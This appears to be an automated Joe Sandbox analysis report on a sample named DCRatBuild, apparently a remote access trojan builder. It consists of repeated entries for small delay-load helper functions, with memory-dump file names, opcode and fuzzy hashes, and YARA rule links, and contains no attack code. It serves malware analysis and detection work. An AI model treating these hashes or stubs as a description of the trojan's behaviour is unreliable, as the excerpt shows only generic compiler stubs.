Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 00bbba3b51b192192764f9091aefe71a6987dad45f5e8e47a0fb6c1699fc783d
Instruction ID: dfdce790837c69823c1a66c47113e0d1283ced9ab5a2002ed646c1341db5fa25
Opcode Fuzzy Hash: 00bbba3b51b192192764f9091aefe71a6987dad45f5e8e47a0fb6c1699fc783d
Instruction Fuzzy Hash: D3B012E53691C2EC31047355DC06C3F014DE7C2B10330403FF84AC4181DC406D400A32

Function 0008E282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E1E3

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7e062ab5369773c1b8149645cca158a3a07c655cf3653e1d86b111644cc6e654
Instruction ID: 141f852d8957601ec7db136e8b95fb6fe71b80abad54992421326fff80c276de
Opcode Fuzzy Hash: 7e062ab5369773c1b8149645cca158a3a07c655cf3653e1d86b111644cc6e654
Instruction Fuzzy Hash: 62B012F9358181EC31047255DD07C3F018CD3C3B10330403FF849C4181DC406E410A32

Function 0008E2B4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E1E3

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3c1e1a71156527adae9d94f8eab84e038513b44a9e879976fd8af1108de774cd
Instruction ID: 9a1c9dffe48e654552fd4b93c4a790b0a4597ce891828689f861013833923cc9
Opcode Fuzzy Hash: 3c1e1a71156527adae9d94f8eab84e038513b44a9e879976fd8af1108de774cd
Instruction Fuzzy Hash: 84B012E5758282EC31147355DC07C7F010CE3C2B10330443FF949C41C1DC406D400A32

Function 0008EAE7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008EAF9

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6a082dfea9078a1c6eaa5261d4f22a72d35bc5804e16b7df2199f895291ea89f
Instruction ID: dc2b8bf5690a9477589d7e1c2f40067dcc54f35a09fefc0c7dd9dfb0f55de2d8
Opcode Fuzzy Hash: 6a082dfea9078a1c6eaa5261d4f22a72d35bc5804e16b7df2199f895291ea89f
Instruction Fuzzy Hash: 8EB0928629A182BC3108B2409902C3A0108E381B90320802AB584880829C8018010932

Function 0008E419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E3FC

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9fcafc88bff9396f1f484a8cf908db1f832683f54d7d7b354b66e9f98972a778
Instruction ID: db93417edcb9c6a0ebad43f8241d58c8b4356add6a8b9cab43f658a98251b4d5
Opcode Fuzzy Hash: 9fcafc88bff9396f1f484a8cf908db1f832683f54d7d7b354b66e9f98972a778
Instruction Fuzzy Hash: 14B012E1258180BC3104B244DD06C7F020CD3C1B10330C03FF648D5181DC400D090E33

Function 0008E423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E3FC

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 258e6e86e837fae7a2fff134aac8acde3e8a478340a1f52c39050e371f03575c
Instruction ID: 6e641e7a5894cde001ab86892087f006b6c607e8de60e383071e53a4233f9fe5
Opcode Fuzzy Hash: 258e6e86e837fae7a2fff134aac8acde3e8a478340a1f52c39050e371f03575c
Instruction Fuzzy Hash: E8B092A1258180BC3204A2449806C3A0208D381B10320802AB948D5181DC444E000A33

Function 0008E44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E3FC

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4f2c44c68ce7d2f3a24dcd46de53ba68ee0123607be8723547ef6fac964a255c
Instruction ID: 72a231b9cac2668ca3f84af1e8ec998d7fc9164e78a2ab2c607f4fd0c4453dfb
Opcode Fuzzy Hash: 4f2c44c68ce7d2f3a24dcd46de53ba68ee0123607be8723547ef6fac964a255c
Instruction Fuzzy Hash: 65B012E1258180FC3204F244DC06C3F020CD3C1B10330C02FF948D5181DC404D040E33

Function 0008E50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E51F

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3a5c16d745d63602815408a9d3af712b7c0fe1ae4085db364d2b703c69421a76
Instruction ID: c6f09af8709c9aece8651292707af85b55c99be5b9049aa64d736cdd82c74629
Opcode Fuzzy Hash: 3a5c16d745d63602815408a9d3af712b7c0fe1ae4085db364d2b703c69421a76
Instruction Fuzzy Hash: B0B012C5258580BC31087364DC06E3F150CE3C2F10330803FF894C4483AC400D040D32

Function 0008E528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E51F

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2ad63c46cac3781ed5c1543d0d9e92380593c7bd3676809c87454ab7af85bc2c
Instruction ID: 5e5d5f9fae2f60e316a2faabe37a77710b93fec62181715fdc5d9670c9aa091e
Opcode Fuzzy Hash: 2ad63c46cac3781ed5c1543d0d9e92380593c7bd3676809c87454ab7af85bc2c
Instruction Fuzzy Hash: 76B012C12585C0BC3108B248DD02D3F190CD3C6F10330803FF948C4181EC400C010A32

Function 0008E532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E51F

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cdfb61279df6bfaf1d78fbce2f63b5a66f494f4e7228336278a043e834c78c2e
Instruction ID: 5bfe529f651bf7e10091e28bbdbb7809b71018edd4cd49db4dea41814d1c97d1
Opcode Fuzzy Hash: cdfb61279df6bfaf1d78fbce2f63b5a66f494f4e7228336278a043e834c78c2e
Instruction Fuzzy Hash: 45B012C1258580BD3108B348DC02E3F150CE7C2F10330802FF848C4181EC400C000A32

Function 0008E546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E51F

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 939fe2b1c3f953baa94b3d26927cc08feb33d0d66724aaf67e017134bc4bc5ac
Instruction ID: 4c778a491a4e97089d6bbffc3479fbc06ead910abfc807cf2738cf66fd674f6b
Opcode Fuzzy Hash: 939fe2b1c3f953baa94b3d26927cc08feb33d0d66724aaf67e017134bc4bc5ac
Instruction Fuzzy Hash: F6B012C1258680BC3208B248DC03D3F150CD3C2F11330422FF848C4181EC401C440A32

Function 0008E593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E580

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6da79a84f7f163a3c0e71ad2e476a521bc3bc3e26908bd7b874894fa8806ece3
Instruction ID: 13563ef5f2856097a493b431cd7fd672b638c00246b6d80b3746082a0124b59b
Opcode Fuzzy Hash: 6da79a84f7f163a3c0e71ad2e476a521bc3bc3e26908bd7b874894fa8806ece3
Instruction Fuzzy Hash: 25B012C6258182BD3104B394DC02C3F010CE7C1B10331402FF448C5181EC400C000B32

Function 0008E5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E580

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 071c243440aedb8de46cf9f6e4eb0bd40b4cc3f120347080a860725765b1fd48
Instruction ID: 25a66acd30b142fd10de6c76854e8352cda845b40ddf1e60977582f0d56bf69e
Opcode Fuzzy Hash: 071c243440aedb8de46cf9f6e4eb0bd40b4cc3f120347080a860725765b1fd48
Instruction Fuzzy Hash: 8BB012C6258191FC3104B294DD02C3F011CD3C1B10331423FF448C5181EC400D010B32

Function 0008E5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E580

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a9bb77263cf30359bfcb84e06717e7fe463551bed807faf91af8e6067d15006f
Instruction ID: 58b712167edce7ce59b88f0aee789bba8fec5ab6595b15aa2f5601a94b444d99
Opcode Fuzzy Hash: a9bb77263cf30359bfcb84e06717e7fe463551bed807faf91af8e6067d15006f
Instruction Fuzzy Hash: 1AB012C6258281FC3144B294DC03C3F011CD3C1B11331422FF448C5181EC400C400B32

Function 0008E219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E1E3

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cb2ac8d10af5baae4bef9beee637bb5321c0606632e5b80949c1ca94487a5270
Instruction ID: 59653ee9c1d7f5ea6fc94963a63e9cda66b2631fc5a7df640caed332609b9445
Opcode Fuzzy Hash: cb2ac8d10af5baae4bef9beee637bb5321c0606632e5b80949c1ca94487a5270
Instruction Fuzzy Hash: 33A002E5759581FC751472519D06C7F011DD6C6B51331452DF956C44815C5069451971

Function 0008E25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E1E3

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2d084cefbb4f5de9b956f7f5e8af3a934cd26e531b208ad571526f784605e68d
Instruction ID: 59653ee9c1d7f5ea6fc94963a63e9cda66b2631fc5a7df640caed332609b9445
Opcode Fuzzy Hash: 2d084cefbb4f5de9b956f7f5e8af3a934cd26e531b208ad571526f784605e68d
Instruction Fuzzy Hash: 33A002E5759581FC751472519D06C7F011DD6C6B51331452DF956C44815C5069451971

Function 0008E27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E1E3

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cb849faf276b919c0707f1e969dd37d95250504eb1e497c734e2b8c767ed2b7a
Instruction ID: 59653ee9c1d7f5ea6fc94963a63e9cda66b2631fc5a7df640caed332609b9445
Opcode Fuzzy Hash: cb849faf276b919c0707f1e969dd37d95250504eb1e497c734e2b8c767ed2b7a
Instruction Fuzzy Hash: 33A002E5759581FC751472519D06C7F011DD6C6B51331452DF956C44815C5069451971

Function 0008E29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E1E3

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
